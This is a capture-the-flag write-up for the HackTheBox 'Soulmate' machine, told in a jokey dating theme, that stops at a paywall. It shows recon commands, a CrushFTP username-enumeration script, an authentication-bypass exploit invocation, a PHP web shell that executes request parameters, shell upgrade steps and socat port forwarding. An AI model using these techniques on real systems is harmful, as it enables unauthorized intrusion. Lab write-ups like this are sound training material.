Soulmate
HackTheBox Soulmate machine writeup — reconnaissance and enumeration walkthrough.
1. Setting the Stage: Reconnaissance
You arrive at the doorstep of Soulmate (10.10.11.86), a digital love factory.
Naturally, you bring your trusty nmap bouquet to impress.
1
nmap -p- -sV --min-rate 1000 -oA scans/soulmate-full 10.10.11.86
🎶 Cue dramatic love song 🎶
Results reveal:
22/tcp SSH (OpenSSH 8.9p1)
80/tcp HTTP (nginx 1.18.0)
4369/tcp Erlang EPMD (Cupid’s creepy sidekick)
You add an alias because typing IPs on a date is rude:
1
echo "10.10.11.86 soulmate.htb" | sudo tee -a /etc/hosts
2. Crafting Your Profile: Web Enumeration
You strut into http://soulmate.htb, where love is supposedly just a click away.
You register as
you@example.com / Passw0rd!(classic).You log in and peek at the Profile → Edit page.
Options:
Name
Bio
Interests
Mobile
And the juiciest part: Profile Picture Upload
Your hacker intuition whispers: “File upload… the Tinder of vulnerabilities.”
3. Uncovering a Hidden Door: Subdomain Discovery
But no dating site is complete without a secret “ex” lurking in the background.
So you fire up ffuf:
1
ffuf -u http://soulmate.htb -H 'Host: FUZZ.soulmate.htb' -w /usr/share/seclists/Discovery/DNS/big.txt -fs 154
💔 Surprise! You find ftp.soulmate.htb—a CrushFTP instance.
1
echo "10.10.11.86 ftp.soulmate.htb" | sudo tee -a /etc/hosts
4. Bypassing Security: CrushFTP Exploit
4.1 Username Probing
You go fishing for names like a desperate stalker scrolling LinkedIn.
1
2
3
4
5
6
7
# probe_crushftp.py
import requests
for user in open('/usr/share/seclists/Usernames/top10000.txt'):
r = requests.post('http://ftp.soulmate.htb/WebInterface/function/',
data={'command':'login','username':user.strip(),'password':'x'})
if 'Invalid password' in r.text:
print(f"Valid user: {user.strip()}")
🎉 Results: admin and root. Jackpot!
4.2 CVE-2025-31161: Authentication Bypass
Turns out Cupid forgot to patch. You slip past like a smooth operator:
1
python3 cve-2025-31161.py --target_host ftp.soulmate.htb --port 80 --target_user admin --new_user matcher --password MatchMe123
Congratulations—you’re now the admin of love.
5. Uploading Your First “Match”: Web Shell
You log in as matcher / MatchMe123.
Give yourself upload rights in
webProd.Time to woo the server with a shiny new shell:
1
2
3
4
5
<?php if(isset($_REQUEST['cmd'])) {
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
} ?>
Upload → shell.php.
Check:
1
curl 'http://soulmate.htb/shell.php?cmd=id'
Response: uid=33(www-data)
✨ You’re officially inside. ✨
6. Land of Scripts: Securing an Interactive Shell
1
2
3
4
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl-Z
stty raw -echo; fg
export TERM=xterm
Now you’re www-data with full TTY powers.
7. Encountering Erlang: Hidden Service
You poke around and notice Erlang lurking:
1
ss -plnt | grep 4369
Ah yes, Erlang’s love dungeon at 127.0.0.1:2222.
8. Crafting a Bridge: socat Port Forwarding
1
socat TCP-LISTEN:3333,reuseaddr,fork TCP:127.0.0.1:2222 &
From Kali:
1
ssh -p 3333 ben@10.10.11.86
But… 💔 Wrong password.
Premium Content
The full exploitation walkthrough, privilege escalation, and flags are available exclusively for members.
Unlock Full Writeup →